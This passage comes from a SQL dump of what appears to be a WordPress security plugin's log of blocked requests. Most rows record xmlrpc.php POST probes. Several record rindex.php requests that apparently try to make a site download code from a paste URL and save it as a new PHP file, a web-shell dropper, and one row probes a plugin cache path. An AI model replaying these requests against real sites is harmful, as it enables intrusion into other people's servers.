Safari\\/537.36\"}','cRKoY1qpMLdXjTGg4tSuWQU5',0,1680982047.6081,1060,'','POST',403,0,515,0,1,'',0),('37.120.210.211',628675283,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9hL7HKI2JE6VTrwNykvnRf1t',0,1680982474.8611,610,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','NWDLBGX7ljH3bKQzFRVUxy9k',0,1680983195.7799,642,'','POST',403,0,515,0,1,'',0),('120.79.227.91',2018501467,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','OLFUaTlWK5ZVYm0dwetqx61H',0,1680983197.3503,594,'','POST',403,0,515,0,1,'',0),('47.88.33.72',794304840,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','YfikurCaSxOFA0l52sqUHdWz',0,1680983203.1393,1131,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','TfxCFIX3JvybmiDNp7e0wlso',0,1680983207.9466,3097,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','pwQNuBFxqXf9JOihk1jPM68A',0,1680983209.3600,3494,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','aVXLQCrDlZJUvd5WYzn2HKwo',0,1680983222.1512,3795,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','Ruy5B8WTx76EvhiLbg0nowpV',0,1680983223.8581,5184,'','POST',403,0,515,0,1,'',0),('171.244.203.166',2884946854,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','SL5qW2aHrFlh7xONboQwuCky',0,1680983224.1397,5511,'','POST',403,0,515,0,1,'',0),('68.235.48.108',1156264044,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Y48JkXLdaQAVNc0CM9EmihBR',0,1680983236.5394,6404,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','nHXmULQDJ1x2jrhO5Pu04W7s',0,1680983236.2466,7000,'','POST',403,0,515,0,1,'',0),('185.151.196.183',3113731255,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','cNYj1p8HrqMngG3h6P0CDwWS',0,1680983238.2418,5598,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','WMQtSC7fR1rGvJzDZc5P4oNi',0,1680983248.7414,2408,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','spSorOhA9XWE0nCxQHPqmya3',0,1680983473.1552,702,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','HPOFnm2S7y4QCd3usAeLwlY9',0,1680983480.1286,565,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Vap0EvsuFTOYSZLWUQ23qGd8',0,1680983485.2363,611,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','HMOdaY0uAnbcvmf5T2ke6h4W',0,1680983488.4105,1356,'','POST',403,0,515,0,1,'',0),('212.90.148.14',3562705934,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','M08ZPwLWxFjY9BigmCyNdE6h',0,1680983489.0755,704,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','aUAuQTcMVErLYJ3IlFPd9nRq',0,1680983492.4025,1391,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ipMkEYlGLynI6tdbV9ZQDuzg',0,1680984190.9631,827,'','POST',403,0,515,0,1,'',0),('213.152.187.225',3583556577,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cz3CmsypFwaiLqM6Xu0RkWPV',0,1680984606.4587,1328,'','POST',403,0,515,0,1,'',0),('213.152.161.211',3583549907,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jimK1fCdcveroNzI5gM8a37G',0,1680984975.5629,613,'','POST',403,0,515,0,1,'',0),('184.75.221.107',3091979627,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SZX5lyAKVoqgzP3wBH94aihO',0,1680986721.9982,1768,'','POST',403,0,515,0,1,'',0),('152.89.160.131',2556010627,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cKbpUfSqQ6m01HNd52jVPyzh',0,1680986942.9662,1543,'','POST',403,0,515,0,1,'',0),('96.47.229.59',1613751611,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','M2DkHbuztUndjpyBCATWGRZ8',0,1680987446.9319,671,'','POST',403,0,515,0,1,'',0),('188.164.198.115',3164915315,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','TZJo3LtCrpc1EQnH8s5ziV96',0,1680989017.7577,3991,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','JKVsGerX8BqQHyS2ho1FpTZL',0,1680989018.1494,3917,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','uQmtZj2zb9sHoh4cYw3ikglF',0,1680989027.4650,595,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','VG5wFZCxLMtNnO8TU7S9cd0J',0,1680989028.2997,581,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','4uBIoerPYg1Vn0aFCRljZ5vS',0,1680989036.6673,1228,'','POST',403,0,515,0,1,'',0),('62.171.174.52',1051438644,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','7mAhoKcIOYC2kfQxiPMbnLB8',0,1680989040.4728,1216,'','POST',403,0,515,0,1,'',0),('198.38.88.243',3324401907,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','e4MpSjHcA5Xr2ixquVCJhgKv',0,1680989040.5584,1239,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','gXjFv7A8L4lkEwypCN2unai3',0,1680989044.6832,603,'','POST',403,0,515,0,1,'',0),('54.249.226.226',922346210,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','6YPsKoyI2jGLVMaeDtShUb7d',0,1680989045.4034,587,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qjmnTEUJYyQ8XwScGtvZ0RWA',0,1680989053.6785,622,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DkHhgpnzNd5vYP4R2LKi1Xe8',0,1680989060.4627,2982,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','NELznVvQ1bq6UYPltiH3Sagu',0,1680989066.7450,1152,'','POST',403,0,515,0,1,'',0),('104.254.90.195',1761499843,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vMgNLAUrp0IVeXuSmGWCbEhJ',0,1680990555.3658,721,'','POST',403,0,515,0,1,'',0),('185.206.225.59',3117343035,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','E9nHsU8vdwGcuRV4yqZazX5A',0,1680990663.3513,573,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YTRL9n0suZKb4NWtlw3eAcBf',0,1680991747.3024,2896,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Y3EuhCJmQPbxkyZ5v84XqrWI',0,1680992061.7879,1270,'','POST',403,0,515,0,1,'',0),('193.47.61.30',3241098526,'','http://cmdev-site1.com/wp-content/plugins/instabuilder2/cache/add.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ZObPTRfgednSluirxzv4qEko',0,1680992626.8231,291,'','GET',403,0,700,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','OVx1UXrQPopsgSYAli8eMN45',0,1680992656.1955,1092,'','POST',403,0,515,0,1,'',0),('46.183.220.203',783801547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','csxmoF4eGIdEv1kXhB5yjHQl',0,1680992917.2075,863,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aFEfPt7WpM1rA6bhmnY3Id0G',0,1680993819.0952,2745,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','gRFaHQhx3ticm4Jy8rYlTPsd',0,1680993822.9601,566,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','FGws7qpMn6btRmNgTB3ZIf2E',0,1680993830.7805,609,'','POST',403,0,515,0,1,'',0),('162.14.102.253',2718852861,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','rjXbQGfiY9nFhcgSPTq0K5aZ',0,1680993846.7075,564,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','LSlg90vAnXIsrpPqwbi4Ujdt',0,1680995009.3390,701,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QZRmIq4sj8VO3gkPN5t2ScEC',0,1680995180.4244,690,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BNY7QT5wuVWHi1k0m6MDlPSq',0,1680995697.7761,2775,'','POST',403,0,515,0,1,'',0),('141.98.102.235',2372036331,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vIhPosfF6aNXA0CU5tG1TVJL',0,1680996521.7843,3848,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','MPZLNYaIw6HGod7srqRWjCnX',0,1680998524.9637,4427,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','yxBc1mPDf6uvIj7eoGbOnXUq',0,1680998529.2976,607,'','POST',403,0,515,0,1,'',0),('140.210.206.84',2362625620,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','8R7vnu1NwiHQGLTg9JlpCOWd',0,1680998539.9605,591,'','POST',403,0,515,0,1,'',0),('79.170.40.178',1336551602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','9eIrvTzq7guJY1kZtjVSi6GK',0,1680998550.9083,659,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','gMAuHW3Xhq7yI6jNLmFaevCQ',0,1680998575.2628,635,'','POST',403,0,515,0,1,'',0),('93.186.120.193',1572501697,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','G3IrvDuXBgNq6Eai2nJTd1he',0,1680998591.4773,757,'','POST',403,0,515,0,1,'',0),('159.69.14.78',2672102990,'','http://cmdev-site1.com/rindex.php?action=add&parameter=gcvbmxgupz.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','STMXDKlCNHvq29YZA4BUu3fO',0,1680998658.4081,1553,'','GET',403,0,700,0,1,'',0),('159.69.14.78',2672102990,'','https://cmdev-site1.com/rindex.php?action=add&parameter=gcvbmxgupz.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','Jic7zIgrYPhQK3ECFT8UHtNw',0,1680998666.5011,358,'','GET',403,0,700,0,1,'',0),('159.69.14.78',2672102990,'','http://www.cmdev-site1.com/rindex.php?action=add&parameter=gcvbmxgupz.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','qhm6b9aY2CWpHRjloVD7tGTw',0,1680998672.5937,307,'','GET',403,0,700,0,1,'',0),('159.69.14.78',2672102990,'','https://www.cmdev-site1.com/rindex.php?action=add&parameter=gcvbmxgupz.php%7Chttps%3A%2F%2Fpaste.bingner.com%2Fpaste%2Fmhcmm%2Fraw','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','xe3g58iBaYDpSbtIwkWJMFsc',0,1680998677.1182,300,'','GET',403,0,700,0,1,'',0),('185.156.175.43',3114053419,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Wg5CfJPnDd7Kr1sXFotEGHaq',0,1680999707.5427,4186,'','POST',403,0,515,0,1,'',0),('199.249.230.2',3355043330,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DI7eAHhWqkS6nfjX34uasyN2',0,1680999856.4475,617,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8CZ0aFrXQd2VLilom9z6PUSq',0,1680999864.3109,598,'','POST',403,0,515,0,1,'',0),('213.152.162.79',3583550031,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fLS90uaVvh4KnNB7mjydXARe',0,1681000537.2485,729,'','POST',403,0,515,0,1,'',0),('185.206.225.59',3117343035,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ipB83S65Lq9wtMU1eJ0f2sWC',0,1681001375.1239,774,'','POST',403,0,515,0,1,'',0),('45.67.217.234',759421418,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MEqCdek3SAyjGKtnBlfOQcx0',0,1681001887.0896,797,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','HMsjQup1O07zg8PvfNJCKGIF',0,1681001890.1009,599,'','POST',403,0,515,0,1,'',0),('86.48.1.153',1445986713,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','bSpFIYqHOu5gLGVd7wh1aW8U',0,1681001896.1955,564,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','Ks2deLjv8qEgWmXf1plU9G3k',0,1681001896.9427,572,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IJaL4NKRYhncUC0ulAfZQE2i',0,1681002721.5684,4346,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','qO568aJkMnNjB2dVylCv4YAb',0,1681002835.8473,2846,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','JCYy1vEsbtTUgoz5kQdl7F6i',0,1681002842.8285,1663,'','POST',403,0,515,0,1,'',0),('62.171.133.145',1051428241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','8VePditTsMGLA3urx0R5cyQn',0,1681002844.8161,1324,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MowdlPcN5B7i3QuSWh8nEyLv',0,1681002845.2907,1132,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','0Z6HiMnjrYqE9GQ4vXS15JCF',0,1681002857.7016,2553,'','POST',403,0,515,0,1,'',0),('84.39.116.180',1411871924,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Poe35YjXLWJKNmEpFbrDRqO9',0,1681003074.3873,4355,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 